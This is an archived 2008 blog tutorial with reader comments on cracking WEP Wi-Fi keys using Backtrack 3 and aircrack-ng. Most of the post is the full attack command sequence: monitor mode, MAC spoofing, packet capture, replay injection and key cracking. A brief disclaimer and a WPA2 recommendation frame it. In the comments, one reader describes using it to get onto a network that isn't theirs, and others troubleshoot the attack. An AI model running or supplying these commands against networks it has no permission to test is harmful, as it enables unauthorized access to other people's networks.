USERID_8861 Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd? Whats the w0rd? Bringing you the w0rd from the virtual streets Home About Contact Link Cloud Store 19 Aug Tutorial: Cracking WEP Using Backtrack 3 Author: Maz   Writing about: Hacking , Informational , Tips and Tricks , lifehacking , mobile , software , technical support « affliction correspondence » Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL. This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack , a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure. Requirements: Backtrack 3 on CD or USB Computer with compatible 802.11 wireless card Wireless Access point or WIFI Router using WEP encryption I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following: Preparing The WIFI Card First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands: modprobe -r iwl3945 modprobe ipwraw The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card: iwconfig Take note of your wireless adapter’s interface name. Then stop the adapter by issuing: airmon-ng stop [device] Then: ifconfig down [interface] Now we must change the MAC address of the adapter: macchanger --mac 00:11:22:33:44:66 [device] Its now time to start the card in monitor mode by doing: airmon-ng start [device] Attacking The Target It is now time to locate a suitable WEP enabled network to work with: airodump-ng [device] Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack: airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device] The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key. Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device] If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type: airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device] This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets. After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] Once you have enough packets, you begin the crack: aircrack-ng -n 128 -b [bssid] [filename]-01.cap The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64. Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it. You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck! « affliction correspondence » Delicious! DiggThis Stumble! Technorati Technorati : View blog reactions Similiar Topics The Last HOPE Wrap-Up (July 24th, 2008) HOPE This Weekend in NYC (July 18th, 2008) Defcon 15 News Round-Up (August 6th, 2007) 19 Users Responsed To " Tutorial: Cracking WEP Using Backtrack 3 " Subsribes to this topic Comment RSS or TrackBack URL Emrikol said, 8-20-2008 in 07:40:04 at 165.139.0.20     Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP) Anon said, 8-21-2008 in 12:30:30 at 123.222.97.173     or you could just buy your web access and not be fucking people over for bandwidth etc. nico said, 8-21-2008 in 21:20:52 at 76.121.109.166     Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks Registered99 said, 8-22-2008 in 13:52:32 at 67.8.114.113     There is no macconfig? macconfig: command not found Maz said, 8-22-2008 in 14:12:59 at 64.52.32.138     @Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Goodluck! dubpluris said, 8-22-2008 in 14:42:34 at 76.169.72.163     Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort. keen said, 8-22-2008 in 15:06:36 at 72.138.72.112     I personally do not worry if someone hack into my route go online. What worry me are when the intentions are further, break into my desktop or use my connection do bad things which would got me a surprise knock on the door by FBI. This is a darn good reason I remain connect with troublesome hard wired or the stick to old router b version. justgeig said, 8-24-2008 in 00:52:00 at 67.236.135.19     just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no? Maz said, 8-24-2008 in 02:44:18 at 75.222.163.109     @justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations. JodoKaast said, 8-27-2008 in 15:12:12 at 67.171.68.60     aircrack-ng also has the PTW algorithm attack, which needs far less IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs. Nick said, 8-29-2008 in 10:01:54 at 81.215.117.146     i have done exactly as you told my wifi chipset is Intel® PRO/Wireless 3945ABG. problem is after i use airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device] i get no packets from my access point. then i use: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] after this i get many packets but like 50000 packets has only 1 IV. the access point im testing on is Dynalink_Datron. Hope someone can help jones said, 9-5-2008 in 02:35:27 at 24.28.254.73     Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs Maz said, 9-5-2008 in 09:01:26 at 64.52.32.138     @jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay Hopefully that will give you a little more background and assist you in your efforts. Goodluck! Goatse said, 9-7-2008 in 19:40:43 at 70.82.182.92     great tutorial, scary moosacha said, 9-11-2008 in 14:21:07 at 166.197.149.121     “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]” If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing wont be ARP packets, so the PWT method will not work for you. You’ll probably need to capture about 1,500,000 IVS before having a good chance of getting the key. Or am I mistaken? josh said, 9-12-2008 in 07:29:11 at 211.30.243.184     hey greeat tut just one question when i run the ifconfig down [wifi0] command i get error something like interface not found, but when i run airmon-ng stop [device] it says interface is wifi0 so im pretty sure its the wright interface, btw interface and device are the same thing on my machine. oh and last thing how do you get out of monitor mode? croakey said, 9-18-2008 in 18:56:19 at 71.204.75.214     This tutorial is wonderful and worked for me! This line however needed the following changes to work for me. before: airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device] after: airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device] Technorati : View blog reactions Trackbacks & Pingbacks Cracking WEP Using Backtrack 3 | What Is Wrong With The World Today mention, 8-22-2008 at 12:45:15 ping from 208.179.83.35     [...] You can use these techniques to demonstrate to others why using WEP is a bad idea.  I suggest you use WPA2 encryption on your wireless networks.  Goodluck! From: http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ [...] Web Sites of Interest » links for 2008-08-24 mention, 8-24-2008 at 08:30:36 ping from 74.220.207.84     [...] Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd? (tags: linux wireless wifi wep hacks hacking cracks cracking) [...] Leave A Reply  Username (*so i know)  Email Address (*will not be published)  Website (*just curious) Security code (Required) * To prove that you're not a bot, enter this code Please Note: Moderation maybe active so there is no need to resubmit your comment. just sit back and enjoy Enter your search terms Submit search form Archives Select Month September 2008 August 2008 July 2008 June 2008 May 2008 April 2008 January 2008 December 2007 November 2007 September 2007 August 2007 July 2007 June 2007 Categories Select Category aggregation Bill of Rights blogging coffee Constitution Customer Service Defcon del.icio.us digital media Economy Editorial electronaut Environment events Free Stuff freedom freeware gadgets Google Hacking History identity Informational Insights lifehacking Milwaukee mobile Netvibes News Neyno NYC open source Partners photo Politics Requests Reviews Site announcements Social Action social networking software streaming stupid technical support Technology the w0rd Tips and Tricks Twitter Uncategorized Video Links web application web2.0 Weirdness windows windows mobile MY STATIONS Maz's Selected Artists - Hip Hop powered by PANDORA Recent Posts Odd Couples and Third Parties Watch Jesse Ventura Speak at the Rally for the Republic Ron Paul on the Colbert Report derivative anon Police State: Tasers Should Be Banned correspondence Tutorial: Cracking WEP Using Backtrack 3 affliction electile dysfunction The Rising Price of Everything: Doom And Gloom erroneous inconsequential unmasked The Last HOPE Wrap-Up Endorsement Campaign for Liberty Required Reading Chris Brogan delusion, seclusion and conclusion Douglas Rushkoff Engadget Free Stuff Times Hack a Day Infowars Jeffrey Barke Lifehacker Mashable NYC or Bust! Read / Write Web The Consumerist Toothpaste For Dinner Urban Dictionary WebWorkerDaily Wired by Whats the w0rd? Copyright 2008 <a href="http://mapstats.blogflux.com/109119.html"><img src="http://mapstats.blogflux.com/button.php?id=109119" alt="Blog Flux MapStats: Stats and Counter for What's the w0rd?" border="0" /></a> thew0rd Original Design and Code by rkcorp XHTML? | CSS? | Subscribe
iterasi archives home
Email Archive
Email the selected archives to as many people as you wish. You may include a message if you'd like.
TO:
(SEPARATE ADDRESSES WITH COMMAS)

MESSAGE:

Please enter the code word you see in the image to the right. If you cannot read the code, click Get New to display a new code.

CAPTCHA Code Image
Code:
  
Embed Code
You can embed a thumbnail and link to this archived page in your own page. Just copy and paste the html snippet below.

Short URL
Use the following short url for direct access to this archived page.



Archived page:

Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd?